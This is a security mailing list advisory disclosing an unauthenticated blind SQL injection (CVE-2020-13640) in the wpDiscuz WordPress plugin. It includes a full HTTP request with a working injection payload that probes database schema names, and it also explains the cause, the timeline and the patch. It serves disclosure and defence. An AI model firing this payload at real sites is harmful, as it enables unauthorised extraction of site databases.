Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <b97e9440-e032-2a1b-3c75-5f7688927fa7@seclab.cs.msu.su>
Date: Mon, 6 Jul 2020 02:13:39 +0300
From: asterite <asterite@...lab.cs.msu.su>
To: oss-security@...ts.openwall.com
Subject: CVE-2020-13640: WordPress Plugin wpDiscuz <= 5.3.5 SQL injection

There is an SQL injection in wpDiscuz plugin [1] version 5.3.5 and
earlier. This vulnerability is not present in 7.X version line. Plugin
vendor is gVectors [2]. The vulnerability can be exploited without
authentication.

## Vulnerability Description ##

wpDiscuz is a plugin working with comments. It has an endpoint
"wpdLoadMoreComments" for fetching comments for post with given id. This
endpoint is vulnerable.

This is a boolean-based blind SQL-injection in parameter "order".
Injected payload gets into "ORDER BY" clause. Injected query output and
error message is not returned by the server, but attacker can use an
error-based binary oracle telling whether query succeeded or not: if
query fails with error, comment list in response will be empty,
otherwise it will contain comments for post which id is given in a
request. This means that, to exploit this vulnerability, an attacker
needs a post with at least one comment (but this is easily achievable
because usually sites have posts with comments and often commenting is
enabled for non-logged-in users).

### Example of request with an attack vector: ###

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: multipart/form-data;
boundary=---------------------------14434359312532120894700338087
Content-Length: 848
Origin: http://localhost
Connection: close

-----------------------------14434359312532120894700338087
Content-Disposition: form-data; name="action"

wpdLoadMoreComments
-----------------------------14434359312532120894700338087
Content-Disposition: form-data; name="offset"

1
-----------------------------14434359312532120894700338087
Content-Disposition: form-data; name="orderBy"

comment_date_gmt
-----------------------------14434359312532120894700338087
Content-Disposition: form-data; name="order"

,  (select case when (ord(SUBSTRING((select SCHEMA_NAME from
information_schema.schemata limit 1), 1, 1)) = 105) then 1 else
1*(select table_name from information_schema.tables)end)=1  asc  #
-----------------------------14434359312532120894700338087
Content-Disposition: form-data; name="postId"

1234
-----------------------------14434359312532120894700338087--

here, injected query performs a test of character code of the first
letter of the name of the first database in MySQL. Usually it's
"information_schema", so the first letter is "i" (with code 105) and the
query will succeed and comments for the post will be in returned response.

An attacker could instead use vector
",  (select case when (ord(SUBSTRING((select SCHEMA_NAME from
information_schema.schemata limit 1), 1, 1)) = 106) then 1 else
1*(select table_name from information_schema.tables)end)=1  asc  #"
(double quotes for clarity) - in this query check would usually fail
(char code is compared with incorrect value 106, so, erroneous else
branch of 'case' will be executed) - so, comment list in response will
be empty.

(legitimate values of "order" parameter are "asc" and "desc")

## Exploit ##

PoC exploit can be found here:
https://github.com/asterite3/CVE-2020-13640/blob/master/exploit.py

## Cause ##

Regarding the cause of vulnerability: if I understood everything
correctly, the reason is that function "loadMoreComments()" in
class.WpdiscuzCore.php takes "_POST['order']" unsanitized and puts it to
"$args['order']", which, after several re-assignments into different
vars/properties, gets appended to "orderby" parameter in
"comments_clauses" hook [3] (in method "commentsClauses()" of
"WpdiscuzCore" class). If I got it right then values affected by
"comments_clauses" hook are put into SQL query (that fetches comments)
without further sanitization - so, it's dangerous to let unsanitized
user input get into them.

## Timeline (dd/mm/yyyy) ##

27/05/2020: Reported to vendor
27/05/2020: CVE assigned
29/05/2020: Reported to WordPress plugin team
29/05/2020: Got response from vendor
12/06/2020: Vendor publishes information about the vulnerability on
plugin site [4] and WP plugin page [5]
12/06/2020: Patched version in 5.X line (5.3.6) is released [6]

## References ##

[1] https://wordpress.org/plugins/wpdiscuz/
[2] https://gvectors.com/
[3] https://developer.wordpress.org/reference/hooks/comments_clauses/
[4]
https://wpdiscuz.com/community/news/security-vulnerability-issue-in-5-3-5-please-udate/
[5] https://wordpress.org/plugins/wpdiscuz/#developers
[6] https://plugins.trac.wordpress.org/log/wpdiscuz/tags/5.3.6?rev=2335769

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.